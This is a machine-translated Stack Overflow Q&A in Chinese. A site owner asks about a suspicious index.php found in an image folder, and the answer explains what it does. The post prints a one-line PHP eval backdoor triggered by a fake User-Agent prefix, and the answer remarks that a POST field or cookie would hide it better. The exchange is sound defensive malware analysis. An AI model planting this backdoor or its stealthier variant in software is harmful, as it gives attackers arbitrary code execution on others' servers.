可疑的PHP文件可能
可疑的PHP文件可能
提问于 2014-10-30 14:20:05
我今天正在寻找你的帮助,以获得一些帮助,关于我在我的FTP创建的一个文件,今天上午。我并不是所有这些PHP函数的专业人士,所以这就是我在这里发布它的原因。
我在子图像文件夹中找到了一个名为index.php的文件。
这是原始代码:
<?php
if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }
?>两个PHP函数
对于函数eval(),他们说它非常危险。
警告()语言结构非常危险,因为它允许执行任意的PHP代码。因此,不鼓励使用它。如果您已经仔细验证了除了使用此构造之外没有其他选项,请特别注意,在未对其进行适当验证之前,不要将任何用户提供的数据传递到其中。
这就是为什么我认为这可能是有人企图黑我的网站,甚至更多。
有谁有能力破译并解释给我听吗?
Thx,
回答 1
Stack Overflow用户
发布于 2014-10-30 14:38:34
是的,这是一个简单的eval后门,安装后,有人可以随时回来,并使用您的服务器,任何他们想要的邪恶。
它接受以Mozilla/5.0 (3.1.final)开头的用户代理字符串(它不是真正的用户代理字符串),并将字符串的其余部分作为eval代码处理,该代码通过eval调用执行。
(奇怪的是,他们为此使用了用户代理,因为该字段通常记录在标准web日志中。使用POST字段或cookie将更加隐蔽。)
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/26655507
复制相关文章
相似问题
腾讯云开发者
